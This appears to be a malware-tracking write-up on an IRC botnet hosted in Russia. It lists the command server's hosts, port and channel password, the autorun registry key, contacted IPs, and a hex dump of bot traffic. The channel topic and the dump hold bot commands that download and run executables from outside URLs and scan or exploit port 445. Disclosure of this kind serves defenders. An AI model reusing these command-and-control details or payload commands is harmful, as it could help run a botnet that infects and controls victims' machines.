aaaa.forexinvest4.com (botnet hosted in the Russian Federation, Vline Ltd)

aaaa.forexinvest4.com ip: 109.196.130.66
aaaa.forexinvest4.com ip: 109.196.130.50
aaaa.forexinvest4.com:6939
PASS laorosr
Channel #dpi
Channel #!
NICK [N00_USA_XP_39922187]
rssr SP2-917 * 0 :COMPUTERNAME
Now talking in #!
Topic is '.asc -S|.http http://walthamfinancial.com/xmob.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a'
Set by teaser57 on Tue Jan 11 08:24:00
Process
Registry autorun key: HKLM\SOFTWARE\Microsoft\Windows\CurrentVer.\policies\Explorer\Run
Value name: Microsoft Driver Setup
Binary: C:\WINDOWS\ggdrive32.exe

UPDATE:
Remote Host       Port Number
112.78.112.208    80
218.85.133.201    80
216.104.45.90     7196

Remote Host       Port Number
112.78.112.208    80
218.85.133.201    80
91.217.162.230    80
123.183.217.32    7196

00000000 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
00000010 | 5F58 505F 3732 3337 BCB9 4020 3A20 5472 | _XP_7237..@ : Tr
00000020 | 7969 6E67 2074 6F20 6765 7420 6578 7465 | ying to get exte
00000030 | 726E 616C 2049 502E 0D0A 5052 5256 4D53 | rnal IP...PRRVMS
00000040 | 4720 5B4E 3030 5F55 5341 5F58 505F 3732 | G [N00_USA_XP_72
00000050 | 3337 BCB9 4020 3A20 5261 6E64 6F6D 2050 | 37..@ : Random P
00000060 | 6F72 7420 5363 616E 2073 7461 7274 6564 | ort Scan started
00000070 | 206F 6E20 3139 322E 782E 782E 783A 3434 | on 192.x.x.x:44
00000080 | 3520 7769 7468 2061 2064 656C 6179 206F | 5 with a delay o
00000090 | 6620 3520 7365 636F 6E64 7320 666F 7220 | f 5 seconds for
000000A0 | 3020 6D69 6E75 7465 7320 7573 696E 6720 | 0 minutes using
000000B0 | 3235 2074 6872 6561 6473 2E0D 0A50 5252 | 25 threads...PRR
000000C0 | 564D 5347 205B 4E30 305F 5553 415F 5850 | VMSG [N00_USA_XP
000000D0 | 5F37 3233 37BC B940 203A 2054 7279 696E | _7237..@ : Tryin
000000E0 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
000000F0 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP...PRRVMSG [
00000100 | 4E30 305F 5553 415F 5850 5F37 3233 37BC | N00_USA_XP_7237.
00000110 | B940 203A 2052 616E 646F 6D20 506F 7274 | .@ : Random Port
00000120 | 2053 6361 6E20 7374 6172 7465 6420 6F6E | Scan started on
00000130 | 2031 3932 2E31 3638 2E78 2E78 3A34 3435 | 192.168.x.x:445
00000140 | 2077 6974 6820 6120 6465 6C61 7920 6F66 | with a delay of
00000150 | 2035 2073 6563 6F6E 6473 2066 6F72 2030 | 5 seconds for 0
00000160 | 206D 696E 7574 6573 2075 7369 6E67 2032 | minutes using 2
00000170 | 3520 7468 7265 6164 732E 0D0A 5052 5256 | 5 threads...PRRV
00000180 | 4D53 4720 5B4E 3030 5F55 5341 5F58 505F | MSG [N00_USA_XP_
00000190 | 3732 3337 BCB9 4020 3A20 5365 7175 656E | 7237..@ : Sequen
000001A0 | 7469 616C 2050 6F72 7420 5363 616E 2073 | tial Port Scan s
000001B0 | 7461 7274 6564 206F 6E20 3139 322E 3136 | tarted on 192.16
000001C0 | 382E 302E 303A 3434 3520 7769 7468 2061 | 8.0.0:445 with a
000001D0 | 2064 656C 6179 206F 6620 3520 7365 636F | delay of 5 seco
000001E0 | 6E64 7320 666F 7220 3020 6D69 6E75 7465 | nds for 0 minute
000001F0 | 7320 7573 696E 6720 3230 2074 6872 6561 | s using 20 threa
00000200 | 6473 2E0D 0A50 5252 564D 5347 205B 4E30 | ds...PRRVMSG [N0
00000210 | 305F 5553 415F 5850 5F37 3233 37BC B940 | 0_USA_XP_7237..@
00000220 | 203A 2053 6571 7565 6E74 6961 6C20 506F | : Sequential Po
00000230 | 7274 2053 6361 6E20 7374 6172 7465 6420 | rt Scan started
00000240 | 6F6E 2031 3932 2E31 3638 2E31 3837 2E30 | on 192.168.187.0
00000250 | 3A34 3435 2077 6974 6820 6120 6465 6C61 | :445 with a dela
00000260 | 7920 6F66 2035 2073 6563 6F6E 6473 2066 | y of 5 seconds f
00000270 | 6F72 2030 206D 696E 7574 6573 2075 7369 | or 0 minutes usi
00000280 | 6E67 2032 3020 7468 7265 6164 732E 0D0A | ng 20 threads...
00000290 | 5052 5256 4D53 4720 5B4E 3030 5F55 5341 | PRRVMSG [N00_USA
000002A0 | 5F58 505F 3732 3337 BCB9 4020 3A20 5365 | _XP_7237..@ : Se
000002B0 | 7175 656E 7469 616C 2050 6F72 7420 5363 | quential Port Sc
000002C0 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
000002D0 | 322E 302E 302E 303A 3434 3520 7769 7468 | 2.0.0.0:445 with
000002E0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
000002F0 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
00000300 | 7465 7320 7573 696E 6720 3130 2074 6872 | tes using 10 thr
00000310 | 6561 6473 2E0D 0A50 4153 5320 6C61 6F72 | eads...PASS laor
00000320 | 6F73 720D 0A4B 4349 4B20 5B4E 3030 5F55 | osr..KCIK [N00_U
00000330 | 5341 5F58 505F 3732 3337 3630 365D 18E7 | SA_XP_7237606]..
00000340 | 400D 0A72 7373 7220 5350 322D 3434 3120 | @..rssr SP2-441
00000350 | 2A20 3020 3A43 4F4D 5055 5445 524E 414D | * 0 :COMPUTERNAM
00000360 | 450D 0A73 656E 6420 2321 2C23 4D61 206F | E..send #!,#Ma o
00000370 | 6F6F 6F0D 0A50 5252 564D 5347 2023 6920 | ooo..PRRVMSG #i
00000380 | 3A48 5454 5020 5345 5420 6874 7470 3A2F | :HTTP SET http:/
00000390 | 2F39 312E 3231 372E 3136 322E 3130 342F | /91.217.162.104/
000003A0 | 6D30 622E 6578 650D 0A | m0b.exe..

Hosting information:
http://whois.domaintools.com/109.196.130.50
